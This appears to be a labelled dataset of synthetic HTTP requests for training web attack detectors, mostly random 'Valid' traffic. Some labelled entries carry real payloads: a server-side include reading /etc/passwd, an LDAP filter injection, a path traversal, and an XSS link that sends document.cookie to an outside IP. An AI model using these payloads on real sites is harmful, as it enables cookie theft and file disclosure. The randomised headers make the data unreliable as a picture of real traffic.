~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29280
Start - Id: 10026
class: Valid
GET /e4tdodrmsne/Kdke1cDiwinntqv5JP/8bi86arnnhs/I_Ji/nsbniidinwxRabtabozA/si/z0i4mr_/dsrnq7hanf0q/ilbkeoewesfcue/8kiscatA/leoa/9IR.shtml?aHe5rl5dm8=tdntmp6&roteTeHr5a=6779&nrs=oz.5PLw6Xy&7sF-or1c3=3886228&ihJate=4864423612&k0srate=c2I&iytbte=5gdMk&eit=55279316&wg=eo_&n1tiRumee=n%3F%7Cy&eE9zohthmiEr=3e%5Cf&hda5odjz=tp&s7trzoh=idre&ynqtlal=t%40r%2Flaa&5Dpx5hrtyp=181 HTTP/1.0
Host: www.vxnsiomiil.fr
Connection: nmYr4w
Accept: video/mpeg, video/*, audio/x-wav;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, compress, compress, identity, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 29.47.242.107
Cookie: eao=syes;on1uiAni2=ai\|Lo85eval
Cookie2: $Version="925"
Date: Mon, 19 Feb 07 19:01:07 CET
ETag: "37Du@YuAnBeW63f@"
Expect: egereuh
From: ma7sea1@tueds.com
If-Modified-Since: Tue, 26 Jan 10 22:08:30 CET
If-Unmodified-Since: Sat, 20 Jun 09 22:13:17 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 253
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: npwt Loartcsg=sdhi
Authorization: hEwjf inest=enme0a
Range: 0-,-74494,959420-8
Referer: /Odis/hdwaa/rypmleE/hNswmli.png
TE: deflate,trailers,trailers
Trailer: From
User-Agent: nlV1BKHlf http://www.frsrso.gov
UA-CPU: 68000
UA-Disp: 528,194,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 470x7016
Via: 2.5 99.83.37.223
Transfer-Encoding: gzip
Upgrade: asoetw/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 156.117.248.41
X-Serial-Number: 21316010619533
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10026
Start - Id: 5457
class: Valid
POST /hu6/rafx8cP/uepnd/aNldfSu5ttPAlLDr/pvsB@GyFZ3SNK72I/hKP-41Vx/sasedSoQsuos1xYBceeo/kcmMczcvBGOv.v7/7Eutmosote1/c7lzajca.php4? HTTP/1.0
Content-Length: 118
Content-Language: dlbebn6r
Content-Encoding: gzip
Content-Location: http://www.sivd.de/dtiv.mpeg
Content-MD5: b2cxNTVybHVuYWNhZXNybg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Sep 08 03:07:23 CET
Last-Modified: Sun, 20 Apr 08 19:47:54 CET
Host: www.goecrf8.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.2, gzip;q=0.9, identity;q=0.1, gzip
Accept-Language: *;q=0.1
Cache-Control: max-age=7378
Client-ip: 33.27.36.229
Cookie: 2tovdT=hAeoE27o5;atsti=0915;ec9=allhtpass:bgtpositionTiA<
Cookie2: $Version="054"
Date: Mon, 05 Jan 04 12:09:10 GMT
ETag: "5DxH4NUkctaWASH"
Expect: Tiiryo
From: seeYcrmn@lLtnoeFTi5.org
If-Modified-Since: Tue, 07 Oct 08 16:56:24 UTC
If-Unmodified-Since: Sat, 16 Jul 05 02:33:46 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Dec 05 10:30:37 GMT
Max-Forwards: 67
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest response="d2FB16AdF8542191FCf959b23cfAeb86"
Authorization: NTLM YXFjZW9lRWFudXRlaXJscmhyZWNrb1RwYXRuaWF4dWhoZWZhMGFsaGd3dHJ1MHBl
Range: 25867-
Referer: http://39tiefpt.be/oehalesl/oIopau9/2ebasejs/nwgn/ynvb.dll
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/0.6 (X11; U; Solaris 2.1; yn-Ht; rv:2.9.5) Gecko/20211230
UA-CPU: PowerPC
UA-Disp: 7113,056,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3880x676
Via: ibl/2.6 www.yuebX.jpg, FTP/1.5 245.103.194.186, 6.9 www.eqor.tiff:7
Transfer-Encoding: deflate
Upgrade: Vue/6.2, ts5om/7.6, wrw/1.5, uvNzee/0.6
Warning: 198 www.earWees.jpg "iai98tpeegtl0r" "Sat, 12 Aug 06 14:50:22 CET"
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 757852
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Logroup byo7P1=@&goa8Ehriyay6sC=ps8gfsshutdownitorj&rDthelt3orae=sligueewu-f&etoSRy8mv=0156063&hexttp5eLrec=95592524

End - Id: 5457
Start - Id: 29972
class: Valid
GET /5t/o8jUsXOEimk8d/cAs@mF54fEU8Ff04F6/sQmCZVf/jed2etpmts1hd/sSernotrkr7c.swf?0eao=xmte&iicee9=aheouieNii&ktaflfXty7=etcehks&cc5XBsam=771566&RAcne=873014&yerde2peu=96&2tE=pfsp8voagipl1&hw=i&ddpb=%5B5hr0Lat&neqss=iT1q&hst8=eLg HTTP/1.0
Host: 114.209.240.102:80
Connection: close
Accept: audio/x-wav;q=0.6, audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: mueer-UmneEfyh
Cache-Control: LkNLdrha='5'
Client-ip: 247.18.105.163
Cookie: 6hrzNsjjrx2e=6iGctYZG-;dbsr=ei;mtSrh5dt=7te;ootestn=mscriptoptidocument;7abu=em4Y3z3pL
Cookie2: $Version="6"
Date: Sun, 27 Jun 04 14:47:58 CET
ETag: W/"hu@1fke@0C9Ln8qFHkn"
Expect: rieTrx
From: nAen2Ew@Xo7tyav4o.biz
If-Modified-Since: Sun, 21 Jan 07 08:37:29 UTC
If-Unmodified-Since: Thu, 24 Jul 08 06:25:56 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Jan 07 20:17:42 GMT
Max-Forwards: 2
MIME-Version: 0.1
Pragma: petaevi='al'
Proxy-Authorization: atyh matlcbq=soaSa
Authorization: NTLM ZmhyU3R6T3RyZzZpcGxodFRtMWVoaGJndHBvc29vY2d1aWEwaDc=
Range: 89712-
Referer: http://rgpoi0.st/ezem/er2e92.doc
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.8 (compatible; MSIE 7.0; Solaris; tdnatvoaS; urwef)
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 453x832
Via: 7.5 53.121.189.61
Transfer-Encoding: compress
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 80.188.232.109
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29972
Start - Id: 24744
class: Valid
GET /iVgf13-h.d7LqCOfP/RK32I.aUXj/ieieldhg7tdajELga.pl? HTTP/1.1
Host: www.rnaeI.net:80
Connection: oe0emtt
Accept: audio/basic, text/*;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.3, compress, identity, compress
Accept-Language: ei-cl
Cache-Control: no-store
Client-ip: 12.198.65.253
Cookie: he0ot=6209756838;ljge2assa=auteghrlinkE-t;trihsmhNhf=skO33Ib
Cookie2: $Version="245"
Date: Sun, 26 Jul 09 08:52:41 GMT
ETag: W/"hfpc@s08k8DrWdBh"
Expect: 100-continue
From: 4Pioe@levcc.org
If-Modified-Since: Wed, 12 Jan 05 18:00:48 UTC
If-Unmodified-Since: Sun, 14 Feb 10 09:54:05 GMT
If-Match: "7IFfS56cHa8ge0PKSL_"
If-None-Match: *
If-Range: Fri, 29 Jun 07 12:39:10 UTC
Max-Forwards: 285
MIME-Version: 4.2
Pragma: yntaess='vrbI'
Proxy-Authorization: NTLM a0ZwemhFeE9pc041aHNhQWhvZXJycGxpb2VyaW8wQ2VlaVZzZXdhWmg=
Authorization: Basic dGFsdXpOd246dWVtdQ==
Range: 991-
Referer: /espt/2lb2/Naa7pe/eiea3.swf
TE: trailers,deflate;q=0.0
Trailer: Max-Forwards
User-Agent: enojtluwnie
UA-CPU: PowerPC
UA-Disp: 572,4672,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 9.7 www.idanbGe.tiff:5, too/0.9 15.95.216.172
Transfer-Encoding: deflate
Upgrade: 0ms/1.3, awuais/6.3
Warning: 152 www.nuoOelo.jpg "ddh66yrn" "Wed, 01 Jun 05 18:22:47 UTC"
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 319119855540809
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24744
Start - Id: 18492
class: Valid
GET /wXRt@mHJ7ALKqwxEVD/MGQpCMIeNusr/rpjneT9dloeowcu/ps/msE/KstyleXkoopen/atfIstlyo/ap0hdjv5oPIkhidQkv.nsf?856nP5=eml&tcndsxrpngTn5jm=96550852&9EWBBbodyvr=909196&ooin=63724677&mpf=RreOm&rhek=866994 HTTP/1.0
Host: www.evcA4Pte.gov
Connection: keep-alive
Accept: video/mpeg;q=0.7, application/*;q=0.6, video/*;q=0.5
Accept-Charset: x-mac-japanese, euc-tw, windows-1254
Accept-Encoding: compress;q=0.4, gzip;q=0.4
Accept-Language: nRr-dntes, rnhi-qL, haRcE-dcei;q=0.9, 7-o
Cache-Control: max-age=027
Client-ip: 117.52.42.62
Cookie: ltti1b3er=minn3;awsOsu=2;evalJHform=44385478;3xmolpvot=2678322254;5noiluo=422174
Cookie2: $Version="7"
Date: Thu, 21 Jul 05 11:58:55 GMT
ETag: W/"-4omQvbN_jok3ub1vq"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Fri, 27 May 05 24:42:42 UTC
If-Unmodified-Since: Wed, 27 May 09 17:59:23 GMT
If-Match: "NhHK2q8rtvqTRG7F"
If-None-Match: "lD92KjCCYFpTEdwY22"
If-Range: Fri, 29 Jan 10 06:13:08 GMT
Max-Forwards: 478
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic aWVoVGh1ZXQ6YW9oaA==
Authorization: Basic YW5sbnVCbzpzZWVyN290
Range: 85-,-50971,7583-04
Referer: http://uoes.fr/uUaty/livgaPew/opkn.jsp
TE: deflate;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: rEra/9.0.0
UA-CPU: MIPS
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 934x751
Via: HTTP/3.9 www.eegr.htm, 2.4 247.175.178.99
Transfer-Encoding: oewL
Upgrade: ryat/0.4, gavm/5.1, n8hana/0.1
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 100961283776
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18492
Start - Id: 39816
class: SSI
GET /srd2uRrtm9I/U3FoptYT@MiHK/iiqhpoeebrsioy/Cadmini_9NC5RBAf/220q/zdJK8zS_.js?zletifGb=5110706&rattetcaihinrs=ir&mind5bed=849818175&QTdivsd7MA5WHd=nshonnode&mUYhdnpdivIP=ci3m8a&nwyoye9he7=%3C%21--++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&ptea1z=a&adfyi=+p-a%27lyke3rgt&WLBpasswd=27487&spcitt=t3%265&eabiaaA=e7taaaSrdocr&adtomzeceanreu=rihod%3Bformghavingsii8&oia9eyilrnot=E+stylea0%3F&s7EnEemiat=txUjnB6%40Z&exti6=leeNritratw HTTP/1.1
Host: www.eamtfhqugp.uk
Connection: gjeir
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.5, deflate;q=0.5
Accept-Language: *;q=0.9
Cache-Control: 5='de6eiaI'
Client-ip: 144.107.45.207
Cookie: tmO8No=m;bg7wib
Cookie2: $Version="15"
Date: Tue, 16 Feb 10 02:55:18 UTC
ETag: W/"N3OJ9wRTHNv3uA18"
Expect: eE2cus9
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Mon, 18 Jun 07 15:24:32 CET
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: "r6Bk5XEZAuTurvrut"
If-None-Match: *
If-Range: *
Max-Forwards: 32
MIME-Version: 8.2
Pragma: Psish=e2susee
Proxy-Authorization: Basic YWVzeXVhOmVtbm5uZmk=
Authorization: Digest username="oeue"
Range: 907419-6,527-485395,5-64
Referer: http://www.eviHo.fr/ioei.jsp
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: i5UAzgU7e http://www.ktdero.it
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 4.2 www.4srt.shtml, HTTP/3.4 www.hsheo.html, 1.1 www.hNahzoh.jpg
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39816
Start - Id: 6035
class: Valid
PUT /h-fWmnoI1AgxSi84pzRH/hC77Tr@SGKcs/Di/zq7E76usDkN5mnCu/fuu/4Ndaoa/ecVN6C7shwpAzLB/atEnaennt/Ohardua6.gif? HTTP/1.0
Content-Length: 123
Content-Language: sdsn7,lhps,sth6le
Content-Encoding: deflate
Content-Location: /atmert2.swf
Content-MD5: RWRlcnJucmVhY25vNXJhcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Mar 06 03:47:01 CET
Last-Modified: Tue, 08 Sep 09 09:13:20 UTC
Host: 123.203.12.13:80
Connection: eneoriU
Accept: text/*;q=0.0, video/*;q=0.9, application/*
Accept-Charset: iso-8859-15;q=0.1, iso-8859-8-i, euc-kr;q=0.4, x-mac-greek
Accept-Encoding: *
Accept-Language: siacr-n22ibaw;q=0.9, m-nhmsoaou
Cache-Control: only-if-cached
Client-ip: 92.218.111.223
Cookie: LT8pZ2K=ADtPbosxie2pefzMg;xIw-RQSxq=-u;hsrehaks2gjaa=uawrnit6lo
Cookie2: $Version="48"
Date: Sun, 26 Aug 07 01:12:49 GMT
ETag: "qJ5zsmHAxiR6qeIWve@l"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Mon, 17 Apr 06 17:01:08 UTC
If-Unmodified-Since: Fri, 26 Jun 09 19:37:43 GMT
If-Match: *
If-None-Match: "MgJwm1Q.U4aL60IEno."
If-Range: Sun, 17 Dec 06 10:42:34 UTC
Max-Forwards: 724
MIME-Version: 8.0
Pragma: sho=ulnawtr
Proxy-Authorization: Basic ZmhyZWNtOnJ0bmE=
Authorization: Basic czluQURyQ3k6bmRhbmhh
Range: 199-6
Referer: /yl6irE/clu1.asmx
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: th1nEOmvb3xc
UA-CPU: Sparc
UA-Disp: 2677,507,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 903x269
Via: HTTP/9.3 www.perl.shtml
Transfer-Encoding: deflate
Upgrade: ctdT90/6.6, ehttn/1.4, ath/2.3, rdties/0.0, wtnsiW/6.4
Warning: 972 www.rXyaxuai.css "RbSVoIei" "Tue, 23 Jan 07 18:13:35 CET"
X-Forwarded-For: 42.67.23.137
X-Serial-Number: 74978987947334907792
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

rrtAtod=ugpf2d9ImNx&PhavingijW7F=e@dsprii3D f3&jOwNr5v=6146503&rerRaqfher= &edocttth=nr9Tnode&adminVIMWd=capwiyAexecuctcs

End - Id: 6035
Start - Id: 31023
class: Valid
GET /4J/fun.js?sesn6no4sEh=h&Mw7L@dFM=87808&bwl6drresgniho=mgt&nhlste5gT3=%40eAe6e&NSzH7@AgAstylesT=Ry&9ito9saCkwkte=n%408u%3Dvposition&Q7LRE=845222&rg=ug2h&2eccac8n=ehnHesSbirk+dt&k9mBGNdh=otdeTa&bdh8dh2ettiapt3=iD-R&aDMRdrop=T34sody&bnezf6Soawu=%5DsyLm HTTP/1.0
Host: 211.130.35.159:80
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: iso-8859-8;q=0.8, iso-8859-1;q=0.0, iso-8859-5, windows-1258, iso-8859-6;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: ek-a7iw;q=0.8, E-5dr;q=0.7, eeuaxee-d0Mr
Cache-Control: only-if-cached
Client-ip: 154.71.85.33
Cookie: htCtns=3&;he=eT
Cookie2: $Version="98"
Date: Wed, 04 Feb 09 01:12:25 GMT
ETag: W/"3UcaAjaeWeHVa3QgvT@"
Expect: dusql=v5tssnad
From: awdsoXt@Sgavtre.cz
If-Modified-Since: Mon, 27 Feb 06 19:03:51 GMT
If-Unmodified-Since: Fri, 24 Jun 05 09:17:56 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Oct 09 09:35:52 UTC
Max-Forwards: 494
MIME-Version: 4.9
Pragma: s=to
Proxy-Authorization: Digest cnonce="VltR"
Authorization: NTLM bnBzb2Vlb28yamRhU0FpbHVzdGVvYzllVUVpYjl0aHM0bGVvZXRuZThzaWx1ZQ==
Range: 934-,-0411,903-198
Referer: http://e5iq.biz/g7sne0l.js
TE: trailers
Trailer: Expect
User-Agent: sgVE.@ http://www.7wum.cz
UA-CPU: MIPS
UA-Disp: 584,4814,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8381x468
Via: FTP/1.1 131.7.58.164, 6.6 0.99.232.228, FTP/7.2 www.s1tiri.jpg
Transfer-Encoding: compress
Upgrade: a8tst/3.7, xhiig/6.8, 9nsjt/3.5
Warning: 016 www.mhuoal.css "jereaoe7fArebseet" 
X-Forwarded-For: 175.214.29.11
X-Serial-Number: 827318624572609
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 31023
Start - Id: 6060
class: Valid
PUT /gsxnohxdr1eo/uKhi2I3f8nR5/ettne.cgi? HTTP/1.1
Content-Length: 155
Content-Language: deam,dasb,e
Content-Encoding: identity
Content-Location: http://laeeS.cz/3sriaet.jpeg
Content-MD5: b3NlY2R3cWVuaWlob2d0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Jun 05 09:14:19 GMT
Last-Modified: Sun, 27 Aug 06 07:01:16 GMT
Host: 96.137.223.80
Connection: hct0eys
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: niqIrbt-Syfhon, 2ji6ob-6haaoae, lSep-tste, d9sOAsa-btwitgen;q=0.5
Cache-Control: only-if-cached
Client-ip: 86.53.159.97
Cookie: aeoe=8l27XcQJMI;qI3oiaeR=yldOv
Cookie2: $Version="173"
Date: Tue, 14 Dec 04 10:39:11 CET
ETag: "H_TpbrzsRCQLXSYfS"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Wed, 11 May 05 03:45:26 UTC
If-Unmodified-Since: Sat, 24 Mar 07 01:57:44 UTC
If-Match: *
If-None-Match: "L-KxdqwKEJbIeE6"
If-Range: Sat, 05 Apr 08 18:49:45 UTC
Max-Forwards: 9344
MIME-Version: 3.9
Pragma: itrrs='daD'
Proxy-Authorization: IEaq ghnuWgnb=dheobaz4
Authorization: Basic M2R6aG46cGY5c2plcw==
Range: -49420,-860
Referer: http://www.caedrsaR.fr/adxvgoru/Ncreywnf.htm
TE: chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (compatible; enDi; Linux i386; t1M40cfol; ael1url)
UA-CPU: StrongARM
UA-Disp: 6911,1089,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 179x0676
Via: 4.8 www.or5Aanto.jpg, eeEp/2.0 www.eipsviA.css
Transfer-Encoding: identity
Upgrade: has5y/4.3, eeohRn/1.7, ahe/4.9, isrias/0.3, tsayOs/5.2
Warning: 497 56.128.16.254 "srleiwfnruIct" 
X-Forwarded-For: 162.114.213.90
X-Serial-Number: 172658995199339
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nhUe=r9ue&OgtuebsNt=Orraodaeinput&sy=d1t2f4s'ndtcaty&ebnt7edgmoe=95601&awnsge=371&tyew0tobC=oOaXtsdN%t&M-mEMTG0evalLrc=oaeeYstka&adhkaheuns4=tLLJQSuKl_

End - Id: 6060
Start - Id: 38343
class: LdapInjection
GET /e5lne/r92Mu5BY5Sv3TDd/rVVFKqWSFPA-E4IqG/YFLDsKfq0hshutdown/nvyia/Xa4C-psoMPjg0nGQ/91-lzO5c624/wL07/ss3pmVesenrnea/Ev-ToCqTbodykp.php3?eceanaraloio=%29%28+++%7C+%28+++cn%3D*o++%27brien*+%29%28mail++++%3D*o+%27brien*%29++&eheamx=tPRp HTTP/1.0
Host: www.cmgesn.net:5
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.4
Accept-Encoding: identity;q=0.3, gzip;q=0.8, compress;q=0.2
Accept-Language: O-ton;q=0.6, to30-dsaseca;q=0.4, iyehi82i-aNwC
Cache-Control: min-fresh=86
Client-ip: 103.183.132.251
Cookie: hnSsebam=931322;rssonem8hreTwde= rau?r2hsst nr
Cookie2: $Version="10"
Date: Wed, 08 Feb 06 10:11:58 GMT
ETag: W/"jY2.4@.9Gn685Hve_bc"
Expect: 100-continue
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 16 Jun 07 13:12:33 UTC
If-Unmodified-Since: Wed, 13 May 09 01:08:00 UTC
If-Match: *
If-None-Match: "PMHHu.9VKtT0TGC"
If-Range: *
Max-Forwards: 0
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM bXB0aXhhMGFvZWM3YWhzZXNnb3RzdGVzeGFsb1RjSGxDMGNhOG5lcmloaHM=
Range: -983,67-,-090
Referer: /jStxnf.msf
TE: trailers,chunked,chunked;q=0.5
Trailer: Pragma
User-Agent: Mozilla/1.0 (compatible; Konqueror/5.1; Unix; lenn; nstfaato; 5yxu274v)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 896x746
Via: uiwtsY/9.5 www.hnetr.jpeg, itow/7.8 www.iaxw.js
Transfer-Encoding: gzip
Upgrade: eaPnRh/6.3, s8Res/6.6, cet/9.4
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 0735348068
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38343
Start - Id: 48113
class: XSS
GET /iu1o4mta1snr6s54oolt/nz@Z_b/l_NNCP.0perl/h44txUWoIxjY0kCfGRu/zUc4RuwzGmXd9pybA/gk6S8@cS.I_mOa/lCmI/Che5feetabhmsoWctra/t3W2RqEZLrud/eSx006m5.52Lbq_LoQC2/y3J@U3str.E8T0.mdb?9Gcmd0_DqPA=yQ2BwXcJqCmP&yoseapytipr=Ueotcec&r8zigBgierkbtf=%3Clink+++++rel++%3D++++%22++stylesheet+++++++%22+++href%3D+++%22+++javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F123.241.9.241%2Fas.asp%27%2Bdocument.cookie%29%3B%5D+++++++%22%3E&eruloanehr=1tr&-RMnph-9K7=mdntmhptDiay84k&rnWnna=38 HTTP/1.1
Host: 77.150.133.87
Connection: close
Accept: video/*;q=0.9, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.7, gzip;q=0.9, deflate
Accept-Language: eeai-pkdopt;q=0.6, ei-urfoq, ibiy14aq-6d
Cache-Control: fsm2bni=eoeneogb
Client-ip: 19.137.26.222
Cookie: Eeoe=uTeenmy;lptlsvtzKetr=[>yil;hslnh=hd47giapotnajg
Cookie2: $Version="832"
Date: Mon, 22 Dec 08 09:54:08 UTC
ETag: W/"GF78l1dMS6kcBxcLqI"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Fri, 27 Feb 04 15:56:49 CET
If-Unmodified-Since: Thu, 27 Apr 06 20:59:13 UTC
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: "ANRymYM0@C.YgZkJxoZ"
If-Range: "edcBr0NRKBaBU8o"
Max-Forwards: 0
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: http://2JzmAmt.de/5etjsC/3ztt/nroeni8.jpg
TE: trailers
Trailer: Accept-Charset
User-Agent: dY1mVnLNaR http://www.efAmXht.com
UA-CPU: Sparc
UA-Disp: 367,260,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: itc/9.4 www.tnaee3a.gif, ihxe/1.2 22.35.3.209:4, 0.4 186.28.142.209
Transfer-Encoding: yrsvso
Upgrade: 1yro/5.7, fny/6.4, xIet/5.5, Uqle/5.3
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48113
Start - Id: 28308
class: Valid
GET /tVw_MEpNLo4/ebNSQL-Ach/x.z/re/tdA6FKQ_BGyg5Jg/ti/Tj/ev@HVg_ZL-sNcH.msf?mpbS62M=t%3AtlthdodivstylesR&eueeeeepNnii=yv9p8O0_Rbk HTTP/1.0
Host: www.swRatmberd.ch
Connection: close
Accept: application/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 247.3.141.125
Cookie: cvTdrrtl6eAEapi=vh47i;oaaeipctonh=o6cduo;f9B@Fmw8=ono1c-n oitIo;css=qat;wu3=79866697
Cookie2: $Version="415"
Date: Mon, 18 May 09 12:11:29 UTC
ETag: W/"H3GHZS5jvgfMOhF0s4"
Expect: rinhqb
From: 33nfa3ed@stws5taroi.biz
If-Modified-Since: Tue, 27 Dec 05 10:50:36 UTC
If-Unmodified-Since: Fri, 10 Aug 07 12:21:19 GMT
If-Match: "Yq8kKN.oP@PE4vGWLa"
If-None-Match: "@qNy4z09lnE1w44mxxe"
If-Range: Tue, 19 Apr 05 15:32:55 GMT
Max-Forwards: 6
MIME-Version: 3.7
Pragma: c='clnzoea'
Proxy-Authorization: eal9O bnowls=ziea
Authorization: NTLM ZHJpZGJqNWdod2U0YmljMW11c2luem50eWFpZzVFdWU=
Range: -626781
Referer: /ohr4/eosotsoE/45ejs/bnonesd/mmsa6orh.mpg
TE: deflate;q=0.3,deflate
Trailer: If-Unmodified-Since
User-Agent: aioiiliwtm/5.3.2
UA-CPU: x86
UA-Disp: 5474,653,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7736x020
Via: dtGt/6.0 215.68.96.86
Transfer-Encoding: gzip
Upgrade: amcAh/7.2, emad3/8.4, oatab/2.4
Warning: 426 www.nrw0ic.jpeg:9 "n4mgt15rinhub" "Tue, 29 Jul 08 12:09:46 CET"
X-Forwarded-For: 95.36.181.34
X-Serial-Number: 353988782
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28308
Start - Id: 45492
class: PathTransversal
GET /6ljl.tiff?rn=78483874&scn=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fietallal%2Fiealet%2Fromane%2Ftr.cfm&ZJ4ATp1c=ctco%29erm&00J@qAbPFMq=afSU&ogOwaeacPoef4=ddmrt HTTP/1.0
Host: 33.106.194.234:5
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-tw, iso-8859-8;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 165.251.254.128
Cookie: sdddEeuetexrqi=05003704
Cookie2: $Version="76"
Date: Mon, 05 Jul 04 10:12:23 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Mon, 21 Mar 05 05:10:53 GMT
If-Unmodified-Since: Sun, 16 Jan 05 07:58:16 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM VXRlZ290YnM0YU50ZjJsSWNoc3RqSWxtc2lvZU9pbXJuRWU=
Authorization: Basic ZHJvZXJ6dDpuYnU1OWVuYQ==
Range: 7-
Referer: /Lqtnd9/ivshaah/71ease0.swf
TE: deflate,chunked,deflate;q=0.4
Trailer: Expect
User-Agent: tciNhvrmoclxeaea
UA-CPU: MIPS
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: HTTP/7.7 www.IoatOhw.js:1, HTTP/5.1 www.um2hd.htm
Transfer-Encoding: dlra; 8toi=srrd
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 108.147.8.117
X-Serial-Number: 8223453
----: --------------------------
